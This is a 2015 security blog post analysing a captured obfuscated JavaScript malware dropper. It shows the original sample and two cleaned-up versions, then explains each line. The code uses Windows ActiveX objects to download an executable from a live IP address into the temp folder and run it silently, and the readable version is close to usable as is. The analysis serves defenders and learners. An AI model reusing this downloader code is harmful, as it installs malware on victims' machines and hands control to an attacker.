Wednesday, November 25, 2015

Malicious Javascript Walk-thru

Saw this malicious obfuscated javascript and though it was worth a walk-thru. It starts as this ugly mess. (
  function (olcdENyNGCBd) {
   function kKVXeV(msezIazw) {
    return new olcdENyNGCBd.ActiveXObject(msezIazw)
   }
   var kMFFvyAqh = true, mEwAroXP = ("B.St"+(221404, "ream"));
   var kbtEwr;
   kbtEwr = function (CJxJzZ, XuSlNgfI, SoRNuldTayYND) {
   tbWEefAFUAZSaO=((1/*s987111nuM69919eOiZ*/)?"WScri":"")+"pt.Shell";
   var CCPoAXzX = kKVXeV(tbWEefAFUAZSaO);
   var pPDVaIAYVOIp = "2.XMLHTTP";
   var CtsZjtNlqpP = kKVXeV("MSXML"+(381144, pPDVaIAYVOIp));
   var tndpSoRVjetRf = "%TEMP%\\";
   var bIVrpPKIHb = CCPoAXzX["Expa"+/*s925956nM261933eOZ*/"ndEnvironmentStrings"](tndpSoRVjetRf)
   var XuSlNgfI = bIVrpPKIHb +(437532602659, XuSlNgfI);
   CtsZjtNlqpP.onreadystatechange = function (){
    if (CtsZjtNlqpP.readyState == 4){
     kMFFvyAqh = false;
     with(kKVXeV("ADOD" + mEwAroXP)){
      open();
      type = 1;
      write(CtsZjtNlqpP.ResponseBody);
      saveToFile(XuSlNgfI, 2);
      close();
      return XuSlNgfI;
     }
    }
   }
   CtsZjtNlqpP.open("G" + (3828034, 4609216, /*dca645894zYtzkrxTK747381IlaIWQJrHGjLqXIjNQmXamgjYPW*/ "ET" /*dcazYtzkrx637703TKIlaIWQJr683091HGjLqXIjNQmX29671amgjYPW*/), CJxJzZ, false);
   CtsZjtNlqpP.send();
   yimseHvs = olcdENyNGCBd.WScript.Sleep(1100)
   while (kMFFvyAqh) {yimseHvs}
   if (((new Date())>0,1656))
    CCPoAXzX.Run(XuSlNgfI, 0, 0);
   }
   XkpYNx = "h";
   XkpYNx += "t"; /*XkpYNxCtsZjtNlqpPkKVXeV*/
   XkpYNx += "tp";
   kbtEwr(XkpYNx + "://" + "46.30.45.73/mert.e"+"x"+"e", "115987449.exe", 1);
  }
)
(this) /*507952955735917811792346152771*/


I can quickly make it prettier by removing the comments, removing the unnecessary concatenations, removing the unncessary conditionals, and replacing the unnecessary variables with their values.

(
  function (olcdENyNGCBd) {
   var kMFFvyAqh = true;
   var kbtEwr = function () {
    var CCPoAXzX = olcdENyNGCBd.ActiveXObject("WScript.Shell");
    var CtsZjtNlqpP = olcdENyNGCBd.ActiveXObject("MSXML2.XMLHTTP"));
    var bIVrpPKIHb = CCPoAXzX["ExpandEnvironmentStrings"]("%TEMP%\\")
    var XuSlNgfI = bIVrpPKIHb +"115987449.exe";
    CtsZjtNlqpP.onreadystatechange = function (){
     if (CtsZjtNlqpP.readyState == 4){
      kMFFvyAqh = false;
      with(olcdENyNGCBd.ActiveXObject("ADODB.Stream")){
       open();
       type = 1;
       write(CtsZjtNlqpP.ResponseBody);
       saveToFile(XuSlNgfI, 2);
       close();
       return XuSlNgfI;
      }
     }
    }
    CtsZjtNlqpP.open("GET" ), "http://46.30.45.73/mert.exe", false);
    CtsZjtNlqpP.send();
    yimseHvs = olcdENyNGCBd.WScript.Sleep(1100)
    while (kMFFvyAqh) {
    yimseHvs
   }
   CCPoAXzX.Run(XuSlNgfI, 0, 0);
  }
  kbtEwr();
  }
)
(this)


Then I can remove the ugly obfuscated variables with things that have more meaning to me, also eliminate the wrapper function call that wasn't necessary.

var isExeStillDownloading = true;
var shellPrompt = this.ActiveXObject("WScript.Shell");
var webRequest = this.ActiveXObject("MSXML2.XMLHTTP"));
var tempFolderPath = shellPrompt["ExpandEnvironmentStrings"]("%TEMP%\\")
var payloadDestination = tempFolderPath +"115987449.exe";
webRequest.onreadystatechange = function (){
  if (webRequest.readyState == 4){
   isExeStillDownloading = false;
   with(this.ActiveXObject("ADODB.Stream")){
    open();
    type = 1;
    write(webRequest.ResponseBody);
    saveToFile(payloadDestination, 2);
    close();
    return payloadDestination;
   }
  }
}
webRequest.open("GET" ), "http://46.30.45.73/mert.exe", false);
webRequest.send();
while (isExeStillDownloading) {
  this.WScript.Sleep(1100)
}
shellPrompt.Run(payloadDestination, 0, 0);


Wow, that looks much more readable! Let's go through line by line now.

var isExeStillDownloading = true;



This variable will be set to true until the EXE is downloaded from the website and then it's set to false.

var shellPrompt = this.ActiveXObject("WScript.Shell");



This variable will hold the ActiveX object that allows the attacker to interact with the command prompt on the windows box.

var webRequest = this.ActiveXObject("MSXML2.XMLHTTP"));



This variable will hold the ActiveX object that allows the attacker to make web requests to download a file.

var tempFolderPath = shellPrompt["ExpandEnvironmentStrings"]("%TEMP%\\")



This variable will hold the windows temp folder path (that he got from using the command prompt variable above). Why does he care about the temp folder? Because it's one place he's almost guaranteed to have write access to so he can download, save, and run a file from it.

var payloadDestination = tempFolderPath +"115987449.exe";



This variable will hold the final destination for the malicious executable the attacker is trying to download to the machine and run.

webRequest.onreadystatechange = function (){
  if (webRequest.readyState == 4){
isExeStillDownloading = false;


This code starts a listener (basically a function that does not get executed until a specific event happens). In this case the listener is on the web request (the file download). The function will get called once the state of the object changed. If the state is changed to 4 (which means request COMPLETED) then this function gets called and the first thing it does is change the variable used above to indicate that the download is complete.

with(this.ActiveXObject("ADODB.Stream")){



This code then creates an ActiveX object that is used to save the downloaded file to the file system on the windows box in the temp folder.

open();
type = 1;
write(webRequest.ResponseBody);
saveToFile(payloadDestination, 2);
close();


Then the ActiveX object above is actually used to write the web request to a file in the temp folder and then save it to disk.

webRequest.open("GET" , "http://46.30.45.73/mert.exe", false);
webRequest.send();
while (isExeStillDownloading) {
  this.WScript.Sleep(1100)
}


Kinda difficult maybe to understand at first, but the listener described in the previous sections wasn't actually executed yet. But now, with the lines above, the web request is used to call for the primary payload (mert.exe). Then the code sits and loops, sleeping, doing nothing until the file completes it's download. One the download is complete, the listener described earlier is called, it sets that variable to false saying that the download is complete, and then it exits the sleeping loop.

shellPrompt.Run(payloadDestination, 0, 0);



The final step is then for the attacker to use the shell prompt to execute the malicious exe that he just downloaded and saved to disk. Say bye-bye to your pc because it's now under his control not yours.





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. php injection walk-thru
  3. vbulletin rce walk-thru


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment